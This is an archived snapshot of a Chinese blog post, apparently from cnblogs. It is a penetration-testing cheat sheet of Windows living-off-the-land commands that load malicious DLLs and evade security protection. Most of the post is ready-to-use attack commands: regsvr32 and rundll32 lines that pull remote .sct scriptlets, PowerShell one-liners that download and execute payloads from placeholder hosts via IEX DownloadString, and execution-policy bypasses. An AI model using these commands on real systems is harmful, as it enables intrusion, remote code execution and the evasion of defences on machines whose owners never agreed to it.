添加链接 注册    登录
link之家
链接快照平台
  • 输入网页链接,自动生成快照
  • 标签化管理网页链接
相关文章推荐
淡定的柠檬  ·  《我的英雄学院》为什么没有人死掉的画面? - 知乎·  1 年前    · 
叛逆的松鼠  ·  2022年10月份优优EV销量276台, ...·  1 年前    · 
眉毛粗的大蒜  ·  mk影视 - 百度·  1 年前    · 
睿智的墨镜  ·  儿子赌气喝母亲手中农药身亡 ...·  1 年前    · 
犯傻的韭菜  ·  男子42万首付被“偷”伤心欲绝 ...·  1 年前    · 
link之家  ›  [总结]加载 DLL 的多种方式 - 肖洋肖恩、
博客园 payload 肖洋
https://www.cnblogs.com/-mo-/p/12670053.html
爱听歌的猴子
1 年前

在渗透测试过程中,意图使目标主机执行恶意 DLL ,达到一定的目的。但在这个过程中总是会遇到各种各种的安全防护,下面通过系统自带的程序来绕过安全防护,加载我们自己想要执行的 DLL 文件: 

#InstallUtil.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
C:\Windows\Microsoft.NET\Framework64\v4.0.3031964\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
#regsvcs.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThings.dll
#regasm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThings.dll
#regsvr32
regsvr32 /s /u AllTheThings.dll
regsvr32 /s AllTheThings.dll
#加载远程脚本执行
regsvr32 /s /u /i:http://ip.xyz/file.sct scrobj.dll
regsvr32 /u /n /s /i:\\192.168.164.1\folder\payload.sct scrobj.dll
#rundll32
rundll32 AllTheThings.dll,EntryPoint
rundll32 javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://ip/payload.sct");window.close();
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}

顺便再补充一下绕过 PowerShell 执行策略的命令:


#本地文件执行
powershell.exe -ExecutionPolicy bypass -File Payload.ps1
powershell.exe exec bypass -Command "& {Import-Module C:\Payload.ps1;Invoke-AllChecks}"
#远程无文件执行
powershell.exe -ExecutionPolicy Bypass-WindowStyle Hidden-NoProfile-NonIIEX(New-ObjectNet.WebClient).DownloadString("http://192.168.1.1/Payload.ps1");[payload的参数]  (去除方括号)
#如果本地的 powershell 命令参数进行了限制,还可以尝试使用 ps_encoder.py 脚本将编码转为 base64 格式

forfiles /p %COMSPEC:~0,19% /s /c "@file -noe" /m po*l.*e
    
----------------------------------------------------------------------------


作者:肖洋肖恩、
 
推荐文章
淡定的柠檬  ·  《我的英雄学院》为什么没有人死掉的画面? - 知乎
1 年前
叛逆的松鼠  ·  2022年10月份优优EV销量276台, 环比增长258.44%_深圳市辉瑞汽车服务有限公司_电车资源
1 年前
眉毛粗的大蒜  ·  mk影视 - 百度
1 年前
睿智的墨镜  ·  儿子赌气喝母亲手中农药身亡 母亲闻讯服毒死亡|服毒身亡|南京|婆媳关系_新浪新闻
1 年前
犯傻的韭菜  ·  男子42万首付被“偷”伤心欲绝 真相让人大跌眼镜|现金|师傅|伤心_新浪新闻
1 年前
今天看啥   ·   Py中国   ·   codingpro   ·   藏经阁   ·   小百科   ·   link之家   ·   卧龙AI搜索
删除内容请联系邮箱 2879853325@qq.com
link之家 - 链接快照平台
© 2024 ~ 沪ICP备11025650号